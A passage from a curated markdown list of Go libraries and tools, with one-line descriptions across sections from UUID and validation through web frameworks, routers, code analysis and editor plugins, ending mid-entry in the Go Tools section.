[nostromo](https://github.com/pokanop/nostromo) - CLI for building powerful aliases.\n- [objwalker](https://github.com/rekby/objwalker) - Walk by go objects with reflection.\n- [okrun](https://github.com/xta/okrun) - go run error steamroller.\n- [olaf](https://github.com/btnguyen2k/olaf) - Twitter Snowflake implemented in Go.\n- [onecache](https://github.com/adelowo/onecache) - Caching library with support for multiple backend stores (Redis, Memcached, filesystem etc).\n- [panicparse](https://github.com/maruel/panicparse) - Groups similar goroutines and colorizes stack dump.\n- [pattern-match](https://github.com/alexpantyukhin/go-pattern-match) - Pattern matching library.\n- [peco](https://github.com/peco/peco) - Simplistic interactive filtering tool.\n- [pgo](https://github.com/arthurkushman/pgo) - Convenient functions for PHP community.\n- [pm](https://github.com/VividCortex/pm) - Process (i.e. goroutine) manager with an HTTP API.\n- [pointer](https://github.com/xorcare/pointer) - Package pointer contains helper routines for simplifying the creation of optional fields of basic type.\n- [ptr](https://github.com/gotidy/ptr) - Package that provide functions for simplified creation of pointers from constants of basic types.\n- [rclient](https://github.com/zpatrick/rclient) - Readable, flexible, simple-to-use client for REST APIs.\n- [reflectutils](https://github.com/muir/reflectutils) - Helpers for working with reflection: struct tag parsing; recursive walking; fill value from string.\n- [remote-touchpad](https://github.com/Unrud/remote-touchpad) - Control mouse and keyboard from a smartphone.\n- [repeat](https://github.com/ssgreg/repeat) - Go implementation of different backoff strategies useful for retrying operations and heartbeating.\n- [request](https://github.com/mozillazg/request) - Go HTTP Requests for Humans™.\n- [rerun](https://github.com/ivpusic/rerun) - Recompiling and rerunning go apps when source changes.\n- [rest-go](https://github.com/edermanoel94/rest-go) - A package that provide many helpful methods for working with rest api.\n- [retry](https://github.com/kamilsk/retry) - The most advanced functional mechanism to perform actions repetitively until successful.\n- [retry](https://github.com/percolate/retry) - A simple but highly configurable retry package for Go.\n- [retry](https://github.com/thedevsaddam/retry) - Simple and easy retry mechanism package for Go.\n- [retry](https://github.com/shafreeck/retry) - A pretty simple library to ensure your work to be done.\n- [retry-go](https://github.com/avast/retry-go) - Simple library for retry mechanism.\n- [retry-go](https://github.com/rafaeljesus/retry-go) - Retrying made simple and easy for golang.\n- [robustly](https://github.com/VividCortex/robustly) - Runs functions resiliently, catching and restarting panics.\n- [rospo](https://github.com/ferama/rospo) - Simple and reliable ssh tunnels with embedded ssh server in Golang.\n- [scan](https://github.com/blockloop/scan) - Scan golang `sql.Rows` directly to structs, slices, or primitive types.\n- [scan](https://github.com/wroge/scan) - Scan sql rows into any type powered by generics.\n- [scany](https://github.com/georgysavva/scany) - Library for scanning data from a database into Go structs and more.\n- [serve](https://github.com/syntaqx/serve) - A static http server anywhere you need.\n- [set](https://github.com/nofeaturesonlybugs/set) - Performant and flexible struct mapping and loose type conversion.\n- [shutdown](https://github.com/ztrue/shutdown) - App shutdown hooks for `os.Signal` handling.\n- [silk](https://github.com/chrispassas/silk) - Read silk netflow files.\n- [slice](https://github.com/psampaz/slice) - Type-safe functions for common Go slice operations.\n- [sliceconv](https://github.com/Henry-Sarabia/sliceconv) - Slice conversion between primitive types.\n- [slicer](https://github.com/leaanthony/slicer) - Makes working with slices easier.\n- [sorty](https://github.com/jfcg/sorty) - Fast Concurrent / Parallel Sorting.\n- [sqlx](https://github.com/jmoiron/sqlx) - provides a set of extensions on top of the excellent built-in database/sql package.\n- [sshman](https://github.com/shoobyban/sshman) - SSH Manager for authorized_keys files on multiple remote servers.\n- [statiks](https://github.com/janiltonmaciel/statiks) - Fast, zero-configuration, static HTTP filer server.\n- [Storm](https://github.com/asdine/storm) - Simple and powerful toolkit for BoltDB.\n- [structs](https://github.com/PumpkinSeed/structs) - Implement simple functions to manipulate structs.\n- [throttle](https://github.com/yudppp/throttle) - Throttle is an object that will perform exactly one action per duration.\n- [tik](https://github.com/andy2046/tik) - Simple and easy timing wheel package for Go.\n- [tome](https://github.com/cyruzin/tome) - Tome was designed to paginate simple RESTful APIs.\n- [toolbox](https://github.com/viant/toolbox) - Slice, map, multimap, struct, function, data conversion utilities. Service router, macro evaluator, tokenizer.\n- [ugo](https://github.com/alxrm/ugo) - ugo is slice toolbox with concise syntax for Go.\n- [UNIS](https://github.com/esemplastic/unis) - Common Architecture™ for String Utilities in Go.\n- [usql](https://github.com/knq/usql) - usql is a universal command-line interface for SQL databases.\n- [util](https://github.com/shomali11/util) - Collection of useful utility functions. (strings, concurrency, manipulations, ...).\n- [watchhttp](https://github.com/nikolaydubina/watchhttp) - Run command periodically and expose latest STDOUT or its rich delta as HTTP endpoint.\n- [wifiqr](https://github.com/reugn/wifiqr) - Wi-Fi QR Code Generator.\n- [wuzz](https://github.com/asciimoo/wuzz) - Interactive cli tool for HTTP inspection.\n- [xferspdy](https://github.com/monmohan/xferspdy) - Xferspdy provides binary diff and patch library in golang.\n\n**[⬆ back to top](#contents)**\n\n## UUID\n\n_Libraries for working with UUIDs._\n\n- [goid](https://github.com/jakehl/goid) - Generate and Parse RFC4122 compliant V4 UUIDs.\n- [gouid](https://github.com/twharmon/gouid) - Generate cryptographically secure random string IDs with just one allocation.\n- [nanoid](https://github.com/aidarkhanov/nanoid) - A tiny and efficient Go unique string ID generator.\n- [sno](https://github.com/muyo/sno) - Compact, sortable and fast unique IDs with embedded metadata.\n- [ulid](https://github.com/oklog/ulid) - Go implementation of ULID (Universally Unique Lexicographically Sortable Identifier).\n- [uniq](https://gitlab.com/skilstak/code/go/uniq) - No hassle safe, fast unique identifiers with commands.\n- [uuid](https://github.com/agext/uuid) - Generate, encode, and decode UUIDs v1 with fast or cryptographic-quality random node identifier.\n- [uuid](https://github.com/gofrs/uuid) - Implementation of Universally Unique Identifier (UUID). Supports both creation and parsing of UUIDs. Actively maintained fork of satori uuid.\n- [uuid](https://github.com/google/uuid) - Go package for UUIDs based on RFC 4122 and DCE 1.1: Authentication and Security Services.\n- [wuid](https://github.com/edwingeng/wuid) - An extremely fast globally unique number generator.\n- [xid](https://github.com/rs/xid) - Xid is a globally unique id generator library, ready to be safely used directly in your server code.\n\n**[⬆ back to top](#contents)**\n\n## Validation\n\n_Libraries for validation._\n\n- [checkdigit](https://github.com/osamingo/checkdigit) - Provide check digit algorithms (Luhn, Verhoeff, Damm) and calculators (ISBN, EAN, JAN, UPC, etc.).\n- [gody](https://github.com/guiferpa/gody) - :balloon: A lightweight struct validator for Go.\n- [govalid](https://github.com/twharmon/govalid) - Fast, tag-based validation for structs.\n- [govalidator](https://github.com/asaskevich/govalidator) - Validators and sanitizers for strings, numerics, slices and structs.\n- [govalidator](https://github.com/thedevsaddam/govalidator) - Validate Golang request data with simple rules. Highly inspired by Laravel's request validation.\n- [jio](https://github.com/faceair/jio) - jio is a json schema validator similar to [joi](https://github.com/hapijs/joi).\n- [ozzo-validation](https://github.com/go-ozzo/ozzo-validation) - Supports validation of various data types (structs, strings, maps, slices, etc.) with configurable and extensible validation rules specified in usual code constructs instead of struct tags.\n- [validate](https://github.com/gookit/validate) - Go package for data validation and filtering. support validate Map, Struct, Request(Form, JSON, url.Values, Uploaded Files) data and more features.\n- [validate](https://github.com/gobuffalo/validate) - This package provides a framework for writing validations for Go applications.\n- [validator](https://github.com/go-playground/validator) - Go Struct and Field validation, including Cross Field, Cross Struct, Map, Slice and Array diving.\n- [Validator](https://github.com/go-the-way/validator) - A lightweight model validator written in Go.Contains VFs:Min, Max, MinLength, MaxLength, Length, Enum, Regex.\n- [valix](https://github.com/marrow16/valix) Go package for validating requests\n\n**[⬆ back to top](#contents)**\n\n## Version Control\n\n_Libraries for version control._\n\n- [cli](https://gitlab.com/gitlab-org/cli) - An open-source GitLab command line tool bringing GitLab's cool features to your command line.\n- [froggit-go](https://github.com/jfrog/froggit-go) - Froggit-Go is a Go library, allowing to perform actions on VCS providers.\n- [gh](https://github.com/rjeczalik/gh) - Scriptable server and net/http middleware for GitHub Webhooks.\n- [git2go](https://github.com/libgit2/git2go) - Go bindings for libgit2.\n- [githooks](https://github.com/gabyx/githooks) - Per-repo and shared Git hooks with version control and auto update.\n- [go-git](https://github.com/go-git/go-git) - highly extensible Git implementation in pure Go.\n- [go-vcs](https://github.com/sourcegraph/go-vcs) - manipulate and inspect VCS repositories in Go.\n- [hercules](https://github.com/src-d/hercules) - gaining advanced insights from Git repository history.\n- [hgo](https://github.com/beyang/hgo) - Hgo is a collection of Go packages providing read-access to local Mercurial repositories.\n\n**[⬆ back to top](#contents)**\n\n## Video\n\n_Libraries for manipulating video._\n\n- [gmf](https://github.com/3d0c/gmf) - Go bindings for FFmpeg av\\* libraries.\n- [go-astisub](https://github.com/asticode/go-astisub) - Manipulate subtitles in GO (.srt, .stl, .ttml, .webvtt, .ssa/.ass, teletext, .smi, etc.).\n- [go-astits](https://github.com/asticode/go-astits) - Parse and demux MPEG Transport Streams (.ts) natively in GO.\n- [go-m3u8](https://github.com/etherlabsio/go-m3u8) - Parser and generator library for Apple m3u8 playlists. Actively maintained version of quangngotan95/go-m3u8 with improvements and latest HLS playlist parsing compatibility.\n- [go-mpd](https://github.com/unki2aut/go-mpd) - Parser and generator library for MPEG-DASH manifest files.\n- [goav](https://github.com/giorgisio/goav) - Comprehensive Go bindings for FFmpeg.\n- [gortsplib](https://github.com/aler9/gortsplib) - Pure Go RTSP server and client library.\n- [gst](https://github.com/ziutek/gst) - Go bindings for GStreamer.\n- [libgosubs](https://github.com/wargarblgarbl/libgosubs) - Subtitle format support for go. Supports .srt, .ttml, and .ass.\n- [libvlc-go](https://github.com/adrg/libvlc-go) - Go bindings for libvlc 2.X/3.X/4.X (used by the VLC media player).\n- [m3u8](https://github.com/grafov/m3u8) - Parser and generator library of M3U8 playlists for Apple HLS.\n- [v4l](https://github.com/korandiz/v4l) - Video capture library for Linux, written in Go.\n\n**[⬆ back to top](#contents)**\n\n## Web Frameworks\n\n_Full stack web frameworks._\n\n- [aah](https://aahframework.org) - Scalable, performant, rapid development Web framework for Go.\n- [Aero](https://github.com/aerogo/aero) - High-performance web framework for Go, reaches top scores in Lighthouse.\n- [Air](https://github.com/aofei/air) - An ideally refined web framework for Go.\n- [anoweb](https://github.com/go-the-way/anoweb) - The lightweight and powerful web framework using the new way for Go.Another go the way.\n- [appy](https://github.com/appist/appy) - An opinionated productive web framework that helps scaling business easier.\n- [Atreugo](https://github.com/savsgio/atreugo) - High performance and extensible micro web framework with zero memory allocations in hot paths.\n- [Banjo](https://github.com/nsheremet/banjo) - Very simple and fast web framework for Go.\n- [Beego](https://github.com/beego/beego) - beego is an open-source, high-performance web framework for the Go programming language.\n- [Buffalo](https://gobuffalo.io) - Bringing the productivity of Rails to Go!\n- [Confetti Framework](https://confetti-framework.github.io/docs/) - Confetti is a Go web application framework with an expressive, elegant syntax. Confetti combines the elegance of Laravel and the simplicity of Go.\n- [Don](https://github.com/abemedia/go-don) - A highly performant and simple to use API framework.\n- [Echo](https://github.com/labstack/echo) - High performance, minimalist Go web framework.\n- [Fiber](https://github.com/gofiber/fiber) - An Express.js inspired web framework build on Fasthttp.\n- [Fireball](https://github.com/zpatrick/fireball) - More \"natural\" feeling web framework.\n- [Flamingo](https://github.com/i-love-flamingo/flamingo) - Framework for pluggable web projects. Including a concept for modules and offering features for DI, Configareas, i18n, template engines, graphql, observability, security, events, routing & reverse routing etc.\n- [Flamingo Commerce](https://github.com/i-love-flamingo/flamingo-commerce) - Providing e-commerce features using clean architecture like DDD and ports and adapters, that you can use to build flexible e-commerce applications.\n- [Gearbox](https://github.com/abahmed/gearbox) - A web framework written in Go with a focus on high performance and memory optimization.\n- [Gin](https://github.com/gin-gonic/gin) - Gin is a web framework written in Go! It features a martini-like API with much better performance, up to 40 times faster. If you need performance and good productivity.\n- [Ginrpc](https://github.com/xxjwxc/ginrpc) - Gin parameter automatic binding tool,gin rpc tools.\n- [Gizmo](https://github.com/NYTimes/gizmo) - Microservice toolkit used by the New York Times.\n- [go-json-rest](https://github.com/ant0ine/go-json-rest) - Quick and easy way to setup a RESTful JSON API.\n- [go-rest](https://github.com/ungerik/go-rest) - Small and evil REST framework for Go.\n- [Goa](https://github.com/goadesign/goa) - Goa provides a holistic approach for developing remote APIs and microservices in Go.\n- [goa](https://github.com/goa-go/goa) - goa is just like koajs for golang, it is a flexible, light, high-performance and extensible web framework based on middleware.\n- [GoFrame](https://github.com/gogf/gf) - GoFrame is a modular, full-featured and production-ready application development framework of golang.\n- [golamb](https://github.com/twharmon/golamb) - Golamb makes it easier to write API endpoints for use with AWS Lambda and API Gateway.\n- [Golax](https://github.com/fulldump/golax) - A non Sinatra fast HTTP framework with support for Google custom methods, deep interceptors, recursion and more.\n- [Golf](https://github.com/dinever/golf) - Golf is a fast, simple and lightweight micro-web framework for Go. It comes with powerful features and has no dependencies other than the Go Standard Library.\n- [Gondola](https://github.com/rainycape/gondola) - The web framework for writing faster sites, faster.\n- [gongular](https://github.com/mustafaakin/gongular) - Fast Go web framework with input mapping/validation and (DI) Dependency Injection.\n- [GoTuna](https://github.com/gotuna/gotuna) - Minimalistic web framework for Go with mux router, middlewares, sessions, templates, embedded views and static files.\n- [goweb](https://github.com/twharmon/goweb) - Web framework with routing, websockets, logging, middleware, static file server (optional gzip), and automatic TLS.\n- [Goyave](https://github.com/go-goyave/goyave) - Feature-complete REST API framework aimed at clean code and fast development, with powerful built-in functionalities.\n- [Hertz](https://github.com/cloudwego/hertz) - A high-performance and strong-extensibility Go HTTP framework that helps developers build microservices.\n- [hiboot](https://github.com/hidevopsio/hiboot) - hiboot is a high performance web application framework with auto configuration and dependency injection support.\n- [Huma](https://github.com/danielgtaylor/huma/) - Framework for modern REST/GraphQL APIs with built-in OpenAPI 3, generated documentation, and a CLI.\n- [Macaron](https://github.com/go-macaron/macaron) - Macaron is a high productive and modular design web framework in Go.\n- [mango](https://github.com/paulbellamy/mango) - Mango is a modular web-application framework for Go, inspired by Rack, and PEP333.\n- [Microservice](https://github.com/claygod/microservice) - The framework for the creation of microservices, written in Golang.\n- [neo](https://github.com/ivpusic/neo) - Neo is minimal and fast Go Web Framework with extremely simple API.\n- [patron](https://github.com/beatlabs/patron) - Patron is a microservice framework following best cloud practices with a focus on productivity.\n- [Pnutmux](https://gitlab.com/fruitygo/pnutmux) - Pnutmux is a powerful Go web framework that uses regex for matching and handling HTTP requests. It offers features such as CORS handling, structured logging, URL parameters extraction, middlewares, and concurrency limiting.\n- [Pulse](https://github.com/gopulse/pulse) - Pulse is an HTTP web framework written in Go (Golang)\n- [Resoursea](https://github.com/resoursea/api) - REST framework for quickly writing resource based services.\n- [REST Layer](https://github.com/rs/rest-layer) - Framework to build REST/GraphQL API on top of databases with mostly configuration over code.\n- [Revel](https://github.com/revel/revel) - High-productivity web framework for the Go language.\n- [rex](https://github.com/goanywhere/rex) - Rex is a library for modular development built upon gorilla/mux, fully compatible with `net/http`.\n- [rk-boot](https://github.com/rookie-ninja/rk-boot) - A bootstrapper library for building enterprise go microservice with Gin and gRPC quickly and easily.\n- [rux](https://github.com/gookit/rux) - Simple and fast web framework for build golang HTTP applications.\n- [tango](https://github.com/lunny/tango) - Micro & pluggable web framework for Go.\n- [tigertonic](https://github.com/rcrowley/go-tigertonic) - Go framework for building JSON web services inspired by Dropwizard.\n- [uAdmin](https://github.com/uadmin/uadmin) - Fully featured web framework for Golang, inspired by Django.\n- [utron](https://github.com/gernest/utron) - Lightweight MVC framework for Go(Golang).\n- [vox](https://github.com/aisk/vox) - A golang web framework for humans, inspired by Koa heavily.\n- [WebGo](https://github.com/bnkamalesh/webgo) - A micro-framework to build web apps; with handler chaining, middleware and context injection. With standard library compliant HTTP handlers(i.e. http.HandlerFunc).\n- [YARF](https://github.com/yarf-framework/yarf) - Fast micro-framework designed to build REST APIs and web services in a fast and simple way.\n\n**[⬆ back to top](#contents)**\n\n### Middlewares\n\n#### Actual middlewares\n\n- [client-timing](https://github.com/posener/client-timing) - An HTTP client for Server-Timing header.\n- [CORS](https://github.com/rs/cors) - Easily add CORS capabilities to your API.\n- [echo-middleware](https://github.com/faabiosr/echo-middleware) - Middleware for Echo framework with logging and metrics.\n- [formjson](https://github.com/rs/formjson) - Transparently handle JSON input as a standard form POST.\n- [go-fault](https://github.com/github/go-fault) - Fault injection middleware for Go.\n- [go-server-timing](https://github.com/mitchellh/go-server-timing) - Add/parse Server-Timing header.\n- [Limiter](https://github.com/ulule/limiter) - Dead simple rate limit middleware for Go.\n- [ln-paywall](https://github.com/philippgille/ln-paywall) - Go middleware for monetizing APIs on a per-request basis with the Lightning Network (Bitcoin).\n- [mid](https://github.com/bobg/mid) - Miscellaneous HTTP middleware features: idiomatic error return from handlers; receive/respond with JSON data; request tracing; and more.\n- [rk-gin](https://github.com/rookie-ninja/rk-gin) - Middleware for Gin framework with logging, metrics, auth, tracing etc.\n- [rk-grpc](https://github.com/rookie-ninja/rk-grpc) - Middleware for gRPC with logging, metrics, auth, tracing etc.\n- [Tollbooth](https://github.com/didip/tollbooth) - Rate limit HTTP request handler.\n- [XFF](https://github.com/sebest/xff) - Handle `X-Forwarded-For` header and friends.\n\n#### Libraries for creating HTTP middlewares\n\n- [alice](https://github.com/justinas/alice) - Painless middleware chaining for Go.\n- [catena](https://github.com/codemodus/catena) - http.Handler wrapper catenation (same API as \"chain\").\n- [chain](https://github.com/codemodus/chain) - Handler wrapper chaining with scoped data (net/context-based \"middleware\").\n- [gores](https://github.com/alioygur/gores) - Go package that handles HTML, JSON, XML and etc. responses. Useful for RESTful APIs.\n- [interpose](https://github.com/carbocation/interpose) - Minimalist net/http middleware for golang.\n- [mediary](https://github.com/HereMobilityDevelopers/mediary) - add interceptors to `http.Client` to allow dumping/shaping/tracing/... of requests/responses.\n- [muxchain](https://github.com/stephens2424/muxchain) - Lightweight middleware for net/http.\n- [negroni](https://github.com/urfave/negroni) - Idiomatic HTTP middleware for Golang.\n- [render](https://github.com/unrolled/render) - Go package for easily rendering JSON, XML, and HTML template responses.\n- [renderer](https://github.com/thedevsaddam/renderer) - Simple, lightweight and faster response (JSON, JSONP, XML, YAML, HTML, File) rendering package for Go.\n- [rye](https://github.com/InVisionApp/rye) - Tiny Go middleware library (with canned Middlewares) that supports JWT, CORS, Statsd, and Go 1.7 context.\n- [stats](https://github.com/thoas/stats) - Go middleware that stores various information about your web application.\n\n**[⬆ back to top](#contents)**\n\n### Routers\n\n- [alien](https://github.com/gernest/alien) - Lightweight and fast http router from outer space.\n- [bellt](https://github.com/GuilhermeCaruso/bellt) - A simple Go HTTP router.\n- [Bone](https://github.com/go-zoo/bone) - Lightning Fast HTTP Multiplexer.\n- [Bxog](https://github.com/claygod/Bxog) - Simple and fast HTTP router for Go. It works with routes of varying difficulty, length and nesting. And he knows how to create a URL from the received parameters.\n- [chi](https://github.com/go-chi/chi) - Small, fast and expressive HTTP router built on net/context.\n- [fasthttprouter](https://github.com/buaazp/fasthttprouter) - High performance router forked from `httprouter`. The first router fit for `fasthttp`.\n- [FastRouter](https://github.com/razonyang/fastrouter) - a fast, flexible HTTP router written in Go.\n- [goblin](https://github.com/bmf-san/goblin) - A golang http router based on trie tree.\n- [gocraft/web](https://github.com/gocraft/web) - Mux and middleware package in Go.\n- [Goji](https://github.com/goji/goji) - Goji is a minimalistic and flexible HTTP request multiplexer with support for `net/context`.\n- [GoLobby/Router](https://github.com/golobby/router) - GoLobby Router is a lightweight yet powerful HTTP router for the Go programming language.\n- [goroute](https://github.com/goroute/route) - Simple yet powerful HTTP request multiplexer.\n- [GoRouter](https://github.com/vardius/gorouter) - GoRouter is a Server/API micro framework, HTTP request router, multiplexer, mux that provides request router with middleware supporting `net/context`.\n- [gowww/router](https://github.com/gowww/router) - Lightning fast HTTP router fully compatible with the net/http.Handler interface.\n- [httprouter](https://github.com/julienschmidt/httprouter) - High performance router. Use this and the standard http handlers to form a very high performance web framework.\n- [httptreemux](https://github.com/dimfeld/httptreemux) - High-speed, flexible tree-based HTTP router for Go. Inspiration from httprouter.\n- [lars](https://github.com/go-playground/lars) - Is a lightweight, fast and extensible zero allocation HTTP router for Go used to create customizable frameworks.\n- [mux](https://github.com/gorilla/mux) - Powerful URL router and dispatcher for golang.\n- [nchi](https://github.com/muir/nchi) - chi-like router built on httprouter with dependency injection based middleware wrappers\n- [ngamux](https://github.com/ngamux/ngamux) - Simple HTTP router for Go.\n- [ozzo-routing](https://github.com/go-ozzo/ozzo-routing) - An extremely fast Go (golang) HTTP router that supports regular expression route matching. Comes with full support for building RESTful APIs.\n- [pure](https://github.com/go-playground/pure) - Is a lightweight HTTP router that sticks to the std \"net/http\" implementation.\n- [Siesta](https://github.com/VividCortex/siesta) - Composable framework to write middleware and handlers.\n- [vestigo](https://github.com/husobee/vestigo) - Performant, stand-alone, HTTP compliant URL Router for go web applications.\n- [violetear](https://github.com/nbari/violetear) - Go HTTP router.\n- [xmux](https://github.com/rs/xmux) - High performance muxer based on `httprouter` with `net/context` support.\n- [xujiajun/gorouter](https://github.com/xujiajun/gorouter) - A simple and fast HTTP router for Go.\n\n**[⬆ back to top](#contents)**\n\n## WebAssembly\n\n- [dom](https://github.com/dennwc/dom) - DOM library.\n- [go-canvas](https://github.com/markfarnan/go-canvas) - Library to use HTML5 Canvas, with all drawing within go code.\n- [tinygo](https://github.com/tinygo-org/tinygo) - Go compiler for small places. Microcontrollers, WebAssembly, and command-line tools. Based on LLVM.\n- [vert](https://github.com/norunners/vert) - Interop between Go and JS values.\n- [wasmbrowsertest](https://github.com/agnivade/wasmbrowsertest) - Run Go WASM tests in your browser.\n- [webapi](https://github.com/gowebapi/webapi) - Bindings for DOM and HTML generated from WebIDL.\n\n**[⬆ back to top](#contents)**\n\n## Windows\n\n- [d3d9](https://github.com/gonutz/d3d9) - Go bindings for Direct3D9.\n- [go-ole](https://github.com/go-ole/go-ole) - Win32 OLE implementation for golang.\n- [gosddl](https://github.com/MonaxGT/gosddl) - Converter from SDDL-string to user-friendly JSON. SDDL consist of four part: Owner, Primary Group, DACL, SACL.\n\n**[⬆ back to top](#contents)**\n\n## XML\n\n_Libraries and tools for manipulating XML._\n\n- [XML-Comp](https://github.com/xml-comp/xml-comp) - Simple command line XML comparer that generates diffs of folders, files and tags.\n- [xml2map](https://github.com/sbabiv/xml2map) - XML to MAP converter written Golang.\n- [xmlwriter](https://github.com/shabbyrobe/xmlwriter) - Procedural XML generation API based on libxml2's xmlwriter module.\n- [xpath](https://github.com/antchfx/xpath) - XPath package for Go.\n- [xquery](https://github.com/antchfx/xquery) - XQuery lets you extract data from HTML/XML documents using XPath expression.\n- [zek](https://github.com/miku/zek) - Generate a Go struct from XML.\n\n## Zero Trust\n\n_Libraries and tools to implement Zero Trust architectures._\n\n- [Cosign](https://github.com/sigstore/cosign) - Container Signing, Verification and Storage in an OCI registry.\n- [in-toto](https://github.com/in-toto/in-toto-golang) - Go implementation of the in-toto (provides a framework to protect the integrity of the software supply chain) python reference implementation.\n- [Spiffe-Vault](https://github.com/philips-labs/spiffe-vault) - Utilizes Spiffe JWT authentication with Hashicorp Vault for secretless authentication.\n- [Spire](https://github.com/spiffe/spire) - SPIRE (the SPIFFE Runtime Environment) is a toolchain of APIs for establishing trust between software systems across a wide variety of hosting platforms.\n\n## Code Analysis\n\n_Source code analysis tools, also known as Static Application Security Testing (SAST) Tools._\n\n- [apicompat](https://github.com/bradleyfalzon/apicompat) - Checks recent changes to a Go project for backwards incompatible changes.\n- [asty](https://github.com/asty-org/asty) - Converts golang AST to JSON and JSON to AST.\n- [blanket](https://gitlab.com/verygoodsoftwarenotvirus/blanket) - blanket is a tool that helps you catch functions which don't have direct unit tests in your Go packages.\n- [ChainJacking](https://github.com/Checkmarx/chainjacking) - Find which of your Go lang direct GitHub dependencies is susceptible to ChainJacking attack.\n- [Chronos](https://github.com/amit-davidson/Chronos) - Detects race conditions statically\n- [dupl](https://github.com/mibk/dupl) - Tool for code clone detection.\n- [errcheck](https://github.com/kisielk/errcheck) - Errcheck is a program for checking for unchecked errors in Go programs.\n- [gcvis](https://github.com/davecheney/gcvis) - Visualise Go program GC trace data in real time.\n- [go-checkstyle](https://github.com/qiniu/checkstyle) - checkstyle is a style check tool like java checkstyle. This tool inspired by java checkstyle, golint. The style referred to some points in Go Code Review Comments.\n- [go-cleanarch](https://github.com/roblaszczak/go-cleanarch) - go-cleanarch was created to validate Clean Architecture rules, like a The Dependency Rule and interaction between packages in your Go projects.\n- [go-critic](https://github.com/go-critic/go-critic) - source code linter that brings checks that are currently not implemented in other linters.\n- [go-mod-outdated](https://github.com/psampaz/go-mod-outdated) - An easy way to find outdated dependencies of your Go projects.\n- [go-outdated](https://github.com/firstrow/go-outdated) - Console application that displays outdated packages.\n- [goast-viewer](https://github.com/yuroyoro/goast-viewer) - Web based Golang AST visualizer.\n- [goimports](https://godoc.org/golang.org/x/tools/cmd/goimports) - Tool to fix (add, remove) your Go imports automatically.\n- [golang-ifood-sdk](https://github.com/arxdsilva/golang-ifood-sdk) - iFood API SDK.\n- [golines](https://github.com/segmentio/golines) - Formatter that automatically shortens long lines in Go code.\n- [GoLint](https://github.com/golang/lint) - Golint is a linter for Go source code.\n- [GoPlantUML](https://github.com/jfeliu007/goplantuml) - Library and CLI that generates text plantump class diagram containing information about structures and interfaces with the relationship among them.\n- [goreturns](https://sourcegraph.com/github.com/sqs/goreturns) - Adds zero-value return statements to match the func return types.\n- [gostatus](https://github.com/shurcooL/gostatus) - Command line tool, shows the status of repositories that contain Go packages.\n- [lint](https://github.com/surullabs/lint) - Run linters as part of go test.\n- [php-parser](https://github.com/z7zmey/php-parser) - A Parser for PHP written in Go.\n- [staticcheck](https://github.com/dominikh/go-tools/tree/master/cmd/staticcheck) - staticcheck is `go vet` on steroids, applying a ton of static analysis checks you might be used to from tools like ReSharper for C#.\n- [tickgit](https://github.com/augmentable-dev/tickgit) - CLI and go package for surfacing code comment TODOs (in any language) and applying a `git blame`to identify the author.\n- [todocheck](https://github.com/preslavmihaylov/todocheck) - Static code analyser which links TODO comments in code with issues in your issue tracker.\n- [unconvert](https://github.com/mdempsky/unconvert) - Remove unnecessary type conversions from Go source.\n- [usestdlibvars](https://github.com/sashamelentyev/usestdlibvars) - A linter that detect the possibility to use variables/constants from the Go standard library.\n- [vaccum](https://github.com/daveshanley/vacuum) - An ultra-super-fast, lightweight OpenAPI linter and quality checking tool.\n- [validate](https://github.com/mccoyst/validate) - Automatically validates struct fields with tags.\n\n**[⬆ back to top](#contents)**\n\n## Editor Plugins\n\n_Plugin for text editors and IDEs._\n\n- [coc-go language server extension for Vim/Neovim](https://github.com/josa42/coc-go) - This plugin adds [gopls](https://github.com/golang/tools/blob/master/gopls/README.md) features to Vim/Neovim.\n- [Go Doc](https://github.com/msyrus/vscode-go-doc) - A Visual Studio Code extension for showing definition in output and generating go doc.\n- [Go plugin for JetBrains IDEs](https://plugins.jetbrains.com/plugin/9568-go) - Go plugin for JetBrains IDEs.\n- [go-language-server](https://github.com/theia-ide/go-language-server) - A wrapper to turn the VSCode go extension into a language server supporting the language-server-protocol.\n- [go-mode](https://github.com/dominikh/go-mode.el) - Go mode for GNU/Emacs.\n- [go-plus](https://github.com/joefitzgerald/go-plus) - Go (Golang) Package For Atom That Adds Autocomplete, Formatting, Syntax Checking, Linting and Vetting.\n- [gocode](https://github.com/nsf/gocode) - Autocompletion daemon for the Go programming language.\n- [goimports-reviser](https://github.com/incu6us/goimports-reviser) - Formatting tool for imports.\n- [goprofiling](https://marketplace.visualstudio.com/items?itemName=MaxMedia.go-prof) - This extension adds benchmark profiling support for the Go language to VS Code.\n- [GoSublime](https://github.com/DisposaBoy/GoSublime) - Golang plugin collection for the text editor SublimeText 3 providing code completion and other IDE-like features.\n- [gounit-vim](https://github.com/hexdigest/gounit-vim) - Vim plugin for generating Go tests based on the function's or method's signature.\n- [theia-go-extension](https://github.com/theia-ide/theia-go-extension) - Go language support for the Theia IDE.\n- [vim-compiler-go](https://github.com/rjohnsondev/vim-compiler-go) - Vim plugin to highlight syntax errors on save.\n- [vim-go](https://github.com/fatih/vim-go) - Go development plugin for Vim.\n- [vscode-go](https://github.com/golang/vscode-go) - Extension for Visual Studio Code (VS Code) which provides support for the Go language.\n- [Watch](https://github.com/eaburns/Watch) - Runs a command in an acme win on file changes.\n\n**[⬆ back to top](#contents)**\n\n## Go Generate Tools\n\n- [generic](https://github.com/usk81/generic) - flexible data type for Go.\n- [genny](https://github.com/cheekybits/genny) - Elegant generics for Go.\n- [gocontracts](https://github.com/Parquery/gocontracts) - brings design-by-contract to Go by synchronizing the code with the documentation.\n- [godal](https://github.com/mafulong/godal) - Generate orm models corresponding to golang by specifying sql ddl file, which can be used by gorm.\n- [gonerics](https://github.com/bouk/gonerics) - Idiomatic Generics in Go.\n- [gotests](https://github.com/cweill/gotests) - Generate Go tests from your source code.\n- [gounit](https://github.com/hexdigest/gounit) - Generate Go tests using your own templates.\n- [hasgo](https://github.com/DylanMeeus/hasgo) - Generate Haskell inspired functions for your slices.\n- [options-gen](https://github.com/kazhuravlev/options-gen) - Functional options described by Dave Cheney's post \"Functional options for friendly APIs\".\n- [re2dfa](https://github.com/opennota/re2dfa) - Transform regular expressions into finite state machines and output Go source code.\n- [sqlgen](https://github.com/anqiansong/sqlgen) - Generate gorm, xorm, sqlx, bun, sql code from SQL file or DSN.\n- [TOML-to-Go](https://xuri.me/toml-to-go) - Translates TOML into a Go type in the browser instantly.\n- [xgen](https://github.com/xuri/xgen) - XSD (XML Schema Definition) parser and Go/C/Java/Rust/TypeScript code generator.\n\n**[⬆ back to top](#contents)**\n\n## Go Tools\n\n- [colorgo](https://github.com/songgao/colorgo) - Wrapper around `go` command for colorized `go build` output.\n- [depth](https://github.com/KyleBanks/depth) - Visualize dependency trees of any package by analyzing imports.\n- [docs](https://github.com/go-oas/docs) - Automatically generate RESTful API documentation for GO 